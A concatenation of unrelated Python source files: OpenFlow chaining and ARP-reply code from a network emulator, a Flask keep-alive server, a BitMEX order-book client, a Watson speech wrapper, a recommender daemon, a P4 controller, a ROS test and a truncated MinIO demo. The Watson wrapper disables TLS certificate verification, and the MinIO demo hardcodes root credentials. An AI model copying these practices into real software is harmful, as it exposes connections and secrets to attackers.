switch_inport_nr, cookie)
cmd_back = 'priority=1,in_port=%s,cookie=%s' % (
switch_outport_nr, cookie)
if i == 0: # first node
cmd = 'in_port=%s' % src_sw_inport_nr
cmd += ',cookie=%s' % cookie
cmd += ',table=%s' % cookie
cmd += ',ip'
cmd += ',ip_dst=%s' % floating_ip
cmd += ',reg1=%s' % index
cmd += ',actions='
# set vlan id
cmd += ',push_vlan:0x8100'
masked_vlan = vlan | 0x1000
cmd += ',set_field:%s->vlan_vid' % masked_vlan
cmd += ',set_field:%s->eth_dst' % target_mac
cmd += ',set_field:%s->ip_dst' % target_ip
cmd += ',output:%s' % switch_outport_nr
# last switch for reverse route
# remove any vlan tags
cmd_back += ',dl_vlan=%s' % vlan
cmd_back += ',actions=pop_vlan,output:%s' % switch_inport_nr
self.setup_arp_reply_at(
current_hop, src_sw_inport_nr, floating_ip, target_mac, cookie=cookie)
elif next_hop == dst_vnf_name: # last switch
# remove any vlan tags
cmd += ',dl_vlan=%s' % vlan
cmd += ',actions=pop_vlan,output:%s' % switch_outport_nr
# set up arp replys at the port so the dst nodes know the
# src
self.setup_arp_reply_at(
current_hop, switch_outport_nr, src_ip, src_mac, cookie=cookie)
# reverse route
cmd_back = 'in_port=%s' % switch_outport_nr
cmd_back += ',cookie=%s' % cookie
cmd_back += ',ip'
cmd_back += ',actions='
cmd_back += 'push_vlan:0x8100'
masked_vlan = vlan | 0x1000
cmd_back += ',set_field:%s->vlan_vid' % masked_vlan
cmd_back += ',set_field:%s->eth_src' % src_mac
cmd_back += ',set_field:%s->ip_src' % floating_ip
cmd_back += ',output:%s' % switch_inport_nr
net.getNodeByName(dst_vnf_name).setHostRoute(
src_ip, dst_vnf_interface)
else: # middle node
# if we have a circle in the path we need to specify this, as openflow will ignore the packet
# if we just output it on the same port as it came in
if switch_inport_nr == switch_outport_nr:
cmd += ',dl_vlan=%s,actions=IN_PORT' % (vlan)
cmd_back += ',dl_vlan=%s,actions=IN_PORT' % (vlan)
else:
cmd += ',dl_vlan=%s,actions=output:%s' % (
vlan, switch_outport_nr)
cmd_back += ',dl_vlan=%s,actions=output:%s' % (
vlan, switch_inport_nr)
# excecute the command on the target switch
logging.debug(cmd)
cmd = "\"%s\"" % cmd
cmd_back = "\"%s\"" % cmd_back
net[current_hop].dpctl(main_cmd, cmd)
net[current_hop].dpctl(main_cmd, cmd_back)
# set next hop for the next iteration step
if isinstance(next_node, OVSSwitch):
switch_inport_nr = net.DCNetwork_graph[current_hop][next_hop][0]['dst_port_nr']
current_hop = next_hop
# advance to next destination
index += 1
# set up the actual load balancing rule as a multipath on the very
# first switch
cmd = '"in_port=%s' % src_sw_inport_nr
cmd += ',cookie=%s' % (cookie)
cmd += ',ip'
cmd += ',actions='
# push 0x01 into the first register
cmd += 'load:0x1->NXM_NX_REG0[]'
# load balance modulo n over all dest interfaces
# TODO: in newer openvswitch implementations this should be changed to symmetric_l3l4+udp
# to balance any kind of traffic
cmd += ',multipath(symmetric_l4,1024,modulo_n,%s,0,NXM_NX_REG1[0..12])' % len(
dest_intfs_mapping)
# reuse the cookie as table entry as it will be unique
cmd += ',resubmit(, %s)"' % cookie
# actually add the flow
logging.debug("Switch: %s, CMD: %s" % (src_sw, cmd))
net[src_sw].dpctl(main_cmd, cmd)
self.floating_cookies[cookie] = floating_ip
return cookie, floating_ip
def setup_arp_reply_at(self, switch, port_nr,
target_ip, target_mac, cookie=None):
"""
Sets up a custom ARP reply at a switch.
An ARP request coming in on the `port_nr` for `target_ip` will be answered with target IP/MAC.
:param switch: The switch belonging to the interface
:type switch: ``str``
:param port_nr: The port number at the switch that is connected to the interface
:type port_nr: ``int``
:param target_ip: The IP for which to set up the ARP reply
:type target_ip: ``str``
:param target_mac: The MAC address of the target interface
:type target_mac: ``str``
:param cookie: cookie to identify the ARP request, if None a new one will be picked
:type cookie: ``int`` or ``None``
:return: cookie
:rtype: ``int``
"""
if cookie is None:
cookie = self.get_cookie()
main_cmd = "add-flow -OOpenFlow13"
# first set up ARP requests for the source node, so it will always
# 'find' a partner
cmd = '"in_port=%s' % port_nr
cmd += ',cookie=%s' % cookie
cmd += ',arp'
# only answer for target ip arp requests
cmd += ',arp_tpa=%s' % target_ip
cmd += ',actions='
# set message type to ARP reply
cmd += 'load:0x2->NXM_OF_ARP_OP[]'
# set src ip as dst ip
cmd += ',move:NXM_OF_ETH_SRC[]->NXM_OF_ETH_DST[]'
# set src mac
cmd += ',set_field:%s->eth_src' % target_mac
# set src as target
cmd += ',move:NXM_NX_ARP_SHA[]->NXM_NX_ARP_THA[], move:NXM_OF_ARP_SPA[]->NXM_OF_ARP_TPA[]'
# set target mac as hex
cmd += ',load:0x%s->NXM_NX_ARP_SHA[]' % "".join(target_mac.split(':'))
# set target ip as hex
octets = target_ip.split('.')
dst_ip_hex = '{:02X}{:02X}{:02X}{:02X}'.format(*map(int, octets))
cmd += ',load:0x%s->NXM_OF_ARP_SPA[]' % dst_ip_hex
# output to incoming port remember the closing "
cmd += ',IN_PORT"'
self.net[switch].dpctl(main_cmd, cmd)
logging.debug(
"Set up ARP reply at %s port %s." % (switch, port_nr))
def delete_flow_by_cookie(self, cookie):
"""
Removes a flow identified by the cookie
:param cookie: The cookie for the specified flow
:type cookie: ``int``
:return: True if successful, else false
:rtype: ``bool``
"""
if not cookie:
return False
logging.debug("Deleting flow by cookie %d" % (cookie))
flows = list()
# we have to call delete-group for each switch
for node in self.net.switches:
flow = dict()
flow["dpid"] = int(node.dpid, 16)
flow["cookie"] = cookie
flow['cookie_mask'] = int('0xffffffffffffffff', 16)
flows.append(flow)
for flow in flows:
logging.debug("Deleting flowentry with cookie %d" % (
flow["cookie"]))
if self.net.controller == RemoteController:
self.net.ryu_REST('stats/flowentry/delete', data=flow)
self.cookies.remove(cookie)
return True
def delete_chain_by_intf(
self, src_vnf_name, src_vnf_intf, dst_vnf_name, dst_vnf_intf):
"""
Removes a flow identified by the vnf_name/vnf_intf pairs
:param src_vnf_name: The vnf name for the specified flow
:type src_vnf_name: ``str``
:param src_vnf_intf: The interface name for the specified flow
:type src_vnf_intf: ``str``
:param dst_vnf_name: The vnf name for the specified flow
:type dst_vnf_name: ``str``
:param dst_vnf_intf: The interface name for the specified flow
:type dst_vnf_intf: ``str``
:return: True if successful, else false
:rtype: ``bool``
"""
logging.debug("Deleting flow for vnf/intf pair %s %s" %
(src_vnf_name, src_vnf_intf))
if not self.check_vnf_intf_pair(src_vnf_name, src_vnf_intf):
return False
if not self.check_vnf_intf_pair(dst_vnf_name, dst_vnf_intf):
return False
target_flow = (src_vnf_name, src_vnf_intf, dst_vnf_name, dst_vnf_intf)
if target_flow not in self.chain_flow_cookies:
return False
success = self.delete_flow_by_cookie(
self.chain_flow_cookies[target_flow])
if success:
del self.chain_flow_cookies[target_flow]
del self.full_chain_data[target_flow]
return True
return False
def delete_loadbalancer(self, vnf_src_name, vnf_src_interface):
'''
Removes a loadbalancer that is configured for the node and interface
:param src_vnf_name: Name of the source VNF
:param src_vnf_interface: Name of the destination VNF
'''
flows = list()
# we have to call delete-group for each switch
delete_group = list()
group_id = self.get_flow_group(vnf_src_name, vnf_src_interface)
for node in self.net.switches:
for cookie in self.lb_flow_cookies[(
vnf_src_name, vnf_src_interface)]:
flow = dict()
flow["dpid"] = int(node.dpid, 16)
flow["cookie"] = cookie
flow['cookie_mask'] = int('0xffffffffffffffff', 16)
flows.append(flow)
group_del = dict()
group_del["dpid"] = int(node.dpid, 16)
group_del["group_id"] = group_id
delete_group.append(group_del)
for flow in flows:
logging.debug("Deleting flowentry with cookie %d belonging to lb at %s:%s" % (
flow["cookie"], vnf_src_name, vnf_src_interface))
if self.net.controller == RemoteController:
self.net.ryu_REST('stats/flowentry/delete', data=flow)
logging.debug("Deleting group with id %s" % group_id)
for switch_del_group in delete_group:
if self.net.controller == RemoteController:
self.net.ryu_REST("stats/groupentry/delete",
data=switch_del_group)
# unmap groupid from the interface
target_pair = (vnf_src_name, vnf_src_interface)
if target_pair in self.flow_groups:
del self.flow_groups[target_pair]
if target_pair in self.full_lb_data:
del self.full_lb_data[target_pair]
def delete_floating_lb(self, cookie):
"""
Delete a floating loadbalancer.
Floating loadbalancers are different from normal ones as there are multiple ones on the same interface.
:param cookie: The cookie of the loadbalancer
:type cookie: ``int``
"""
cookie = int(cookie)
if cookie not in self.floating_cookies:
raise Exception(
"Can not delete floating loadbalancer as the flowcookie is not known")
self.delete_flow_by_cookie(cookie)
floating_ip = self.floating_cookies[cookie]
self.floating_network.withdraw_ip_address(floating_ip)
def set_arp_entry(self, vnf_name, vnf_interface, ip, mac):
"""
Sets an arp entry on the specified VNF. This is done on the node directly and not by open vswitch!
:param vnf_name: Name of the VNF
:type vnf_name: ``str``
:param vnf_interface: Name of the interface
:type vnf_interface: ``str``
:param ip: IP to reply to
:type ip: ``str``
:param mac: Answer with this MAC
:type mac: ``str``
"""
node = self.net.getNodeByName(vnf_name)
node.cmd("arp -i %s -s %s %s" % (vnf_interface, ip, mac))
|
webserver.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "I'm alive"
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
|
bitmex_book.py
|
# -*- coding: utf-8 -*-
# - OrderBook Websocket Thread -
# 🦏 **** quan.digital **** 🦏
# authors: canokaue & thomgabriel
# date: 03/2020
# kaue.cano@quan.digital
# Simplified implementation of connecting to BitMEX websocket for streaming realtime orderbook data.
# Optimized for OrderBookL2 handling using Red and Black Binary Search Trees - https://www.programiz.com/dsa/red-black-tree
# Originally developed for Quan Digital's Whale Watcher project - https://github.com/quan-digital/whale-watcher
# Code based on stock Bitmex API connectors - https://github.com/BitMEX/api-connectors/tree/master/official-ws/python/bitmex_websocket.py
# As well as pmaji's GDAX OrderBook thread - https://github.com/pmaji/crypto-whale-watching-app/blob/master/gdax_book.py
# The Websocket offers a bunch of data as raw properties right on the object.
# On connect, it synchronously asks for a push of all this data then returns.
# Docs: https://www.bitmex.com/app/wsAPI
import websocket
import threading
import traceback
from time import sleep
import json
import logging
import urllib
from decimal import Decimal
from bintrees import RBTree
from operator import itemgetter
from tqdm import tqdm
# Websocket timeout in seconds
CONN_TIMEOUT = 5
# It's recommended not to grow a table larger than 200. Helps cap memory usage.
MAX_TABLE_LEN = 200
class BitMEXBook:
def __init__(self, endpoint="https://www.bitmex.com/api/v1", symbol='XBTUSD'):
'''Connect to the websocket and initialize data stores.'''
self.logger = logging.getLogger(__name__)
self.logger.debug("Initializing WebSocket.")
self.endpoint = endpoint
self.symbol = symbol
self.data = {}
self.keys = {}
self.exited = False
self._asks = RBTree()
self._bids = RBTree()
# We can subscribe right in the connection querystring, so let's build that.
# Subscribe to all pertinent endpoints
wsURL = self.__get_url()
self.logger.debug("Connecting to %s" % wsURL)
self.__connect(wsURL, symbol)
self.logger.info('Connected to WS, waiting for partials.')
# Connected. Wait for partials
self.__wait_for_symbol(symbol)
self.logger.info('Got all market data. Starting.')
def init(self):
self.logger.debug("Initializing WebSocket...")
self.data = {}
self.keys = {}
self.exited = False
wsURL = self.__get_url()
self.logger.debug("Connecting to URL -- %s" % wsURL)
self.__connect(wsURL, self.symbol)
self.logger.info('Connected to WS, waiting for partials.')
# Connected. Wait for partials
self.__wait_for_symbol(self.symbol)
self.logger.info('Got all market data. Starting.')
def error(self, err):
self._error = err
self.logger.error(err)
#self.exit()
def __del__(self):
self.exit()
def reset(self):
self.logger.warning('Websocket resetting...')
self.ws.close()
self.logger.info('Weboscket closed.')
self.logger.info('Restarting...')
self.init()
def exit(self):
'''Call this to exit - will close websocket.'''
self.exited = True
self.ws.close()
### Main orderbook function
def get_current_book(self):
result = {
'asks': [],
'bids': []
}
for ask in self._asks:
try:
# There can be a race condition here, where a price point is removed
# between these two ops
this_ask = self._asks[ask]
except KeyError:
continue
for order in this_ask:
result['asks'].append([order['price'], order['size'], order['id']]) #(order['size']/Decimal(order['price']))
# Same procedure for bids
for bid in self._bids:
try:
this_bid = self._bids[bid]
except KeyError:
continue
for order in this_bid:
result['bids'].append([order['price'], order['size'], order['id']]) #(order['size']/Decimal(order['price']))
return result
# -----------------------------------------------------------------------------------------
# ----------------------RBTrees Handling---------------------------------------------------
# -----------------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------------
# Get current minimum ask price from tree
def get_ask(self):
return self._asks.min_key()
# Get ask given id
def get_asks(self, id):
return self._asks.get(id)
# Remove ask form tree
def remove_asks(self, id):
self._asks.remove(id)
# Insert ask into tree
def set_asks(self, id, asks):
self._asks.insert(id, asks)
# Get current maximum bid price from tree
def get_bid(self):
return self._bids.max_key()
# Get bid given id
def get_bids(self, id):
return self._bids.get(id)
# Remove bid form tree
def remove_bids(self, id):
self._bids.remove(id)
# Insert bid into tree
def set_bids(self, id, bids):
self._bids.insert(id, bids)
# Add order to out watched orders
def add(self, order):
order = {
'id': order['id'], # Order id data
'side': order['side'], # Order side data
'size': Decimal(order['size']), # Order size data
'price': order['price'] # Order price data
}
if order['side'] == 'Buy':
bids = self.get_bids(order['id'])
if bids is None:
bids = [order]
else:
bids.append(order)
self.set_bids(order['id'], bids)
else:
asks = self.get_asks(order['id'])
if asks is None:
asks = [order]
else:
asks.append(order)
self.set_asks(order['id'], asks)
# Order is done, remove it from watched orders
def remove(self, order):
oid = order['id']
if order['side'] == 'Buy':
bids = self.get_bids(oid)
if bids is not None:
bids = [o for o in bids if o['id'] != order['id']]
if len(bids) > 0:
self.set_bids(oid, bids)
else:
self.remove_bids(oid)
else:
asks = self.get_asks(oid)
if asks is not None:
asks = [o for o in asks if o['id'] != order['id']]
if len(asks) > 0:
self.set_asks(oid, asks)
else:
self.remove_asks(oid)
# Updating order price and size
def change(self, order):
new_size = Decimal(order['size'])
# Bitmex updates don't come with price, so we use the id to match it instead
oid = order['id']
if order['side'] == 'Buy':
bids = self.get_bids(oid)
if bids is None or not any(o['id'] == order['id'] for o in bids):
return
index = list(map(itemgetter('id'), bids)).index(order['id'])
bids[index]['size'] = new_size
self.set_bids(oid, bids)
else:
asks = self.get_asks(oid)
if asks is None or not any(o['id'] == order['id'] for o in asks):
return
index = list(map(itemgetter('id'), asks)).index(order['id'])
asks[index]['size'] = new_size
self.set_asks(oid, asks)
tree = self._asks if order['side'] == 'Sell' else self._bids
node = tree.get(oid)
if node is None or not any(o['id'] == order['id'] for o in node):
return
# -----------------------------------------------------------------------------------------
# ----------------------WS Private Methods-------------------------------------------------
# -----------------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------------
def __connect(self, wsURL, symbol):
'''Connect to the websocket in a thread.'''
self.logger.debug("Starting thread")
self.ws = websocket.WebSocketApp(wsURL,
on_message=self.__on_message,
on_close=self.__on_close,
on_open=self.__on_open,
on_error=self.__on_error)
self.wst = threading.Thread(target=lambda: self.ws.run_forever())
self.wst.daemon = True
self.wst.start()
self.logger.debug("Started thread")
# Wait for connect before continuing
conn_timeout = CONN_TIMEOUT
while (not self.ws.sock or not self.ws.sock.connected) and conn_timeout:
sleep(1)
conn_timeout -= 1
if not conn_timeout:
self.logger.error("Couldn't connect to WS! Exiting.")
# self.exit()
# raise websocket.WebSocketTimeoutException('Couldn\'t connect to WS! Exiting.')
self.reset()
def __get_url(self):
'''
Generate a connection URL. We can define subscriptions right in the querystring.
Most subscription topics are scoped by the symbol we're listening to.
'''
symbolSubs = ["orderBookL2"]
subscriptions = [sub + ':' + self.symbol for sub in symbolSubs]
urlParts = list(urllib.parse.urlparse(self.endpoint))
urlParts[0] = urlParts[0].replace('http', 'ws')
urlParts[2] = "/realtime?subscribe={}".format(','.join(subscriptions))
return urllib.parse.urlunparse(urlParts)
def __wait_for_symbol(self, symbol):
'''On subscribe, this data will come down. Wait for it.'''
pbar = tqdm(total=160)
# Wait until data reaches our RBTrees
while self._asks.is_empty() and self._bids.is_empty():
sleep(0.1)
pbar.update(3)
pbar.close()
def __send_command(self, command, args=None):
'''Send a raw command.'''
if args is None:
args = []
self.ws.send(json.dumps({"op": command, "args": args}))
def __on_message(self, message):
'''Handler for parsing WS messages.'''
message = json.loads(message)
# self.logger.debug(json.dumps(message))
table = message['table'] if 'table' in message else None
action = message['action'] if 'action' in message else None
# table = message.get("table")
# action = message.get("action")
try:
# RBTrees for orderBook
if table == 'orderBookL2':
# For every order received
try:
for order in message['data']:
if action == 'partial':
self.logger.debug('%s: adding partial %s' % (table, order))
self.add(order)
elif action == 'insert':
self.logger.debug('%s: inserting %s' % (table, order))
self.add(order)
elif action == 'update':
self.logger.debug('%s: updating %s' % (table, order))
self.change(order)
elif action == 'delete':
self.logger.debug('%s: deleting %s' % (table, order))
self.remove(order)
else:
raise Exception("Unknown action: %s" % action)
except:
self.logger.error('Error handling RBTrees: %s' % traceback.format_exc())
# Uncomment this to watch RBTrees evolution in real time
# self.logger.info('==============================================================')
# self.logger.info('=============================ASKS=============================')
# self.logger.info('==============================================================')
# self.logger.info(self._asks)
# self.logger.info('==============================================================')
# self.logger.info('=============================BIDS=============================')
# self.logger.info('==============================================================')
# self.logger.info(self._bids)
except:
self.logger.error(traceback.format_exc())
def __on_error(self, error):
'''Called on fatal websocket errors. We exit on these.'''
if not self.exited:
self.logger.error("Error : %s" % error)
raise websocket.WebSocketException(error)
def __on_open(self):
'''Called when the WS opens.'''
self.logger.debug("Websocket Opened.")
def __on_close(self):
'''Called on websocket close.'''
self.logger.info('Websocket Closed')
# Utility method for finding an item in the store.
# When an update comes through on the websocket, we need to figure out which item in the array it is
# in order to match that item.
# Helpfully, on a data push (or on an HTTP hit to /api/v1/schema), we have a "keys" array. These are the
# fields we can use to uniquely identify an item. Sometimes there is more than one, so we iterate through
# all provided keys.
def find_by_keys(keys, table, matchData):
for item in table:
if all(item[k] == matchData[k] for k in keys):
return item
|
watsonspeechapi.py
|
# -*- coding: utf-8 -*-
"""
https://github.com/watson-developer-cloud/python-sdk/blob/master/examples/microphone-speech-to-text.py
"""
import io
import threading
import queue
from watson_developer_cloud import SpeechToTextV1
from watson_developer_cloud.websocket import RecognizeCallback, AudioSource
import numpy as np
from logzero import logger
import model.key
cont_type = "audio/wav"
lang = "ja-JP_BroadbandModel"
def TranscodeFromFile(path, sample_rate):
try:
with io.open(path, 'rb') as audio_file:
# watson connection
stt = SpeechToTextV1(
iam_apikey=model.key.WATSON_APIKEY, url=model.key.WATSON_URL)
response = stt.recognize(
audio=audio_file, content_type=cont_type, model=lang)
result_json = response.result
for i in range(len(result_json["results"])):
logger.debug(
result_json["results"][i]["alternatives"][0]["transcript"])
return result_json["results"][0]["alternatives"][0]["transcript"]
except:
return ""
# define callback for the speech to text service
class MyRecognizeCallback(RecognizeCallback):
def __init__(self, parent):
RecognizeCallback.__init__(self)
self._parent = parent
def on_transcription(self, transcript):
logger.debug(f'on_transcription:{transcript}')
self._parent.write_result(transcript[0]["transcript"])
def on_connected(self):
logger.debug('on_connected:Connection was successful')
def on_error(self, error):
logger.error(f'on_error:{error}')
def on_inactivity_timeout(self, error):
logger.debug(f'on_inactivity_timeout:{error}')
def on_listening(self):
logger.debug('on_listening:Service is listening')
def on_hypothesis(self, hypothesis):
logger.debug(f'on_hypothesis:{hypothesis}')
self._parent.write_result(hypothesis)
def on_data(self, data):
logger.debug(f'on_data:{data}')
def on_close(self):
logger.debug("on_close:Connection closed")
class Transcoder:
def __init__(self):
logger.info('__init__:Enter')
self._token = None
self.transcript = None
self._queue = queue.Queue()
self._stt = SpeechToTextV1(
iam_apikey=model.key.WATSON_APIKEY, url=model.key.WATSON_URL)
self._audio_source = AudioSource(self._queue, True, True)
# 2019/04/14現在、WebSocketのエンドポイントの証明書が不正扱いになっているので以下を設定する
self._stt.disable_SSL_verification()
def start(self, token):
"""Start up streaming speech call"""
logger.info('start:Enter')
self._token = token
threading.Thread(target=self.process).start()
def write_result(self, transcipt):
self.transcript = transcipt
def write_stream(self, buf):
if(buf is None):
self._queue.put(buf)
else:
arr = (buf * 32767).astype(np.int16)
arr_bytes = arr.tobytes('C')
self._queue.put(arr_bytes)
def process(self):
logger.info('process:Enter')
mycallback = MyRecognizeCallback(self)
logger.info('start transcode')
self._stt.recognize_using_websocket(
audio=self._audio_source,
content_type='audio/l16; rate=16000',
recognize_callback=mycallback,
interim_results=True,
model=lang)
logger.info('end transcode')
|
server.py
|
from .recommender import Recommender
from daemon import Daemon, Socket
from threading import Thread
from queue import Queue
import os, time
def lazyprop(fn):
attr_name = '_lazy_' + fn.__name__
@property
def _lazyprop(self):
if not hasattr(self, attr_name):
setattr(self, attr_name, fn(self))
return getattr(self, attr_name)
return _lazyprop
class Server():
def __init__(
self,
host,
port,
logfile,
pidfile,
queue_limit,
documents_n,
persons_n,
recs_limit,
invalidate_after):
self.host = host
self.port = port
self.logfile = logfile
self.pidfile = pidfile
self.queue_limit = queue_limit
self.documents_n = documents_n
self.persons_n = persons_n
self.recs_limit = recs_limit
self.invalidate_after = invalidate_after
self.chkdir(logfile)
self.chkdir(pidfile)
self.logfile_fh = open(logfile, 'a')
@lazyprop
def daemon(self):
return Daemon(self.pidfile, self.onstart)
@lazyprop
def socket(self):
return Socket(self.host, self.port, self.dispatch)
@lazyprop
def queue(self):
return Queue()
@lazyprop
def recommender(self):
return Recommender(
self.documents_n,
self.persons_n,
self.invalidate_after,
self.recs_limit)
def chkdir(self, sfile):
sdir = os.path.dirname(sfile)
if not os.path.isdir(sdir):
os.makedirs(sdir)
def command(self, cmd):
return self.daemon.command(cmd)
def onstart(self):
self.thread = Thread(target=self.dispatcher)
self.thread.start()
self.socket.listen()
self.recommender # init
def dispatch(self, message):
if self.queue.qsize() >= self.queue_limit:
message.response(self._pack_response('QFULL'))
else:
self.queue.put(message)
def dispatcher(self):
while True:
message = self.queue.get()
try:
method, did, pid = message.data.decode('ascii').split(',')
if method == 'RECR':
self.recommender.record(did, pid)
elif method == 'RECM':
recs = self.recommender.recommend(did, pid)
message.response(self._pack_response('OK', recs))
elif method == 'RR':
self.recommender.record(did, pid)
recs = self.recommender.recommend(did, pid)
message.response(self._pack_response('OK', recs))
elif method == 'PH':
dids = self.recommender.person_history(pid)
message.response(self._pack_response('OK', dids))
else:
raise Exception
except:
message.response(self._pack_response('BADMSG'))
self.queue.task_done()
def _pack_response(self, status, data = []):
return bytes(','.join([status] + data), 'ascii')
|
switch_controller.py
|
import binascii
import threading
import simplejson as json
import struct
import p4runtime_lib.bmv2
import p4runtime_lib.helper
class BaseController:
def __init__(self, p4info_file_path, bmv2_file_path):
self.switches = {}
self.port_queues = {}
self.port_threads = {}
self.p4info_helper = p4runtime_lib.helper.P4InfoHelper(p4info_file_path)
self.p4info_file_path = p4info_file_path
self.bmv2_file_path = bmv2_file_path
self.packet_in_threads = []
self.application_mapping = {}
def add_switch_connection(self, name, address, device_id, type='bmv2',
crypto_address=None, debug=False, notification_socket=None,
num_ports=15):
sw = p4runtime_lib.bmv2.Bmv2SwitchConnection(name=name, address=address, device_id=device_id, debug=debug)
self.switches[sw.name] = {"connection": sw, "usable_register_index": set(range(1024))}
def startup(self):
for switch_name, switch_data in self.switches.items():
switch_data["connection"].SetForwardingPipelineConfig(p4info=self.p4info_helper.p4info,
bmv2_json_file_path=self.bmv2_file_path)
t = threading.Thread(target=switch_data["connection"].send_init_and_wait, args=(self.response_callback,))
t.start()
self.packet_in_threads.append(t)
def teardown(self):
for switch_name, switch_data in self.switches.items():
switch_data["connection"].stop_waiting()
for t in self.packet_in_threads:
t.join()
def register_application(self, application, packet_in_codes):
for code in packet_in_codes:
self.application_mapping[code] = application
def install_table_entries_from_json(self, configuration_file_path):
with open(configuration_file_path, 'r') as f:
table_entries = json.load(f)
for switch_name, table_entries in table_entries.items():
for entry in table_entries:
table_entry = self.p4info_helper.buildTableEntry(
table_name=entry['table'],
match_fields=entry['match'],
action_name=entry['action_name'],
action_params=entry['action_params'])
self.switches[switch_name]["connection"].WriteTableEntry(table_entry)
print("[+] Successfully installed table entries from " + configuration_file_path + " on " + switch_name)
def build_and_install_table_entry(self, switch_name, entry):
table_entry = self.p4info_helper.buildTableEntry(
table_name=entry['table_name'],
match_fields=entry['match_fields'],
action_name=entry['action_name'],
action_params=entry['action_params']
)
self.switches[switch_name]["connection"].WriteTableEntry(table_entry)
def response_callback(self, switch, response):
if response.packet.payload:
# Parse CPU packet
reason = struct.unpack(">H", response.packet.payload[8:10])[0]
ingress_port = struct.unpack(">H", response.packet.payload[10:12])[0]
timestamp = int(str(binascii.hexlify(response.packet.payload[12:18])), 16)
# Delegate to registered handler
if reason in self.application_mapping:
self.application_mapping[reason].packet_in(reason, response.packet.payload)
else:
print("[!] No registered handler for this CPU packet reason.")
|
test_buffer_client.py
|
# Copyright 2019 Open Source Robotics Foundation, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of the Willow Garage nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import threading
import time
import unittest
import rclpy
from tf2_ros.buffer_client import BufferClient
from geometry_msgs.msg import TransformStamped
from tf2_msgs.action import LookupTransform
from tf2_py import BufferCore, LookupException
from rclpy.executors import SingleThreadedExecutor
from tf2_msgs.msg import TF2Error
def build_transform(target_frame, source_frame, stamp):
transform = TransformStamped()
transform.header.frame_id = target_frame
transform.header.stamp = stamp
transform.child_frame_id = source_frame
transform.transform.translation.x = 42.0
transform.transform.translation.y = -3.14
transform.transform.translation.z = 0.0
transform.transform.rotation.w = 1.0
transform.transform.rotation.x = 0.0
transform.transform.rotation.y = 0.0
transform.transform.rotation.z = 0.0
return transform
class MockBufferServer():
def __init__(self, node, buffer_core):
self.action_server = rclpy.action.ActionServer(node, LookupTransform, 'lookup_transform', self.execute_callback)
self.node = node
self.buffer_core = buffer_core
self.result_buffer = {}
def execute_callback(self, goal_handle):
response = LookupTransform.Result()
response.transform = TransformStamped()
response.error = TF2Error()
try:
if not goal_handle.request.advanced:
transform = self.buffer_core.lookup_transform_core(target_frame=goal_handle.request.target_frame,
source_frame=goal_handle.request.source_frame,
time=goal_handle.request.source_time)
else:
transform = self.buffer_core.lookup_transform_full_core(
target_frame=goal_handle.request.target_frame,
source_frame=goal_handle.request.source_frame,
source_time=goal_handle.request.source_time,
target_time=goal_handle.request.target_time,
fixed_frame=goal_handle.request.fixed_frame
)
response.transform = transform
except LookupException as e:
response.error.error = TF2Error.LOOKUP_ERROR
return response
class TestBufferClient(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.context = rclpy.context.Context()
rclpy.init(context=cls.context)
cls.executor = SingleThreadedExecutor(context=cls.context)
cls.node = rclpy.create_node('TestBufferClient', context=cls.context)
cls.executor.add_node(cls.node)
buffer_core = BufferCore()
transform = build_transform('foo', 'bar', rclpy.time.Time().to_msg())
buffer_core.set_transform(transform, 'unittest')
cls.mock_action_server = MockBufferServer(cls.node, buffer_core)
@classmethod
def tearDownClass(cls):
cls.node.destroy_node()
rclpy.shutdown(context=cls.context)
def setUp(self):
self.spinning = threading.Event()
self.spin_thread = threading.Thread(target=self.spin)
self.spin_thread.start()
def tearDown(self):
self.spinning.set()
self.spin_thread.join()
def spin(self):
while self.context.ok() and not self.spinning.is_set():
self.executor.spin_once(timeout_sec=0.05)
def test_lookup_transform_true(self):
buffer_client = BufferClient(
self.node, 'lookup_transform', check_frequency=10.0, timeout_padding=0.0)
result = buffer_client.lookup_transform(
'foo', 'bar', rclpy.time.Time().to_msg(), rclpy.duration.Duration(seconds=5.0))
self.assertEqual(build_transform(
'foo', 'bar', rclpy.time.Time().to_msg()), result)
def test_lookup_transform_fail(self):
buffer_client = BufferClient(
self.node, 'lookup_transform', check_frequency=10.0, timeout_padding=0.0)
with self.assertRaises(LookupException) as ex:
result = buffer_client.lookup_transform(
'bar', 'baz', rclpy.time.Time().to_msg(), rclpy.duration.Duration(seconds=5.0))
self.assertEqual(LookupException, type(ex.exception))
if __name__ == '__main__':
unittest.main()
|
demo_minio.py
|
import threading
import os
import time
import subprocess
# export MINIO_ROOT_USER=minio_credential MINIO_ROOT_PASSWORD=minio_credential
os.putenv("MINIO_ROOT_USER", "minio_credential")
os.putenv("MINIO_ROOT_PASSWORD", "minio_credential")
def start_minio():
os.system('minio server --console-address ":9001" /Users/zheng/Desktop/minio_data')
def stop_minio():
print("add alias")
subprocess.run(
"mc alias set myminio http://localhost:9000 minio_credential minio_credential", shell=True
)
print("shutting")
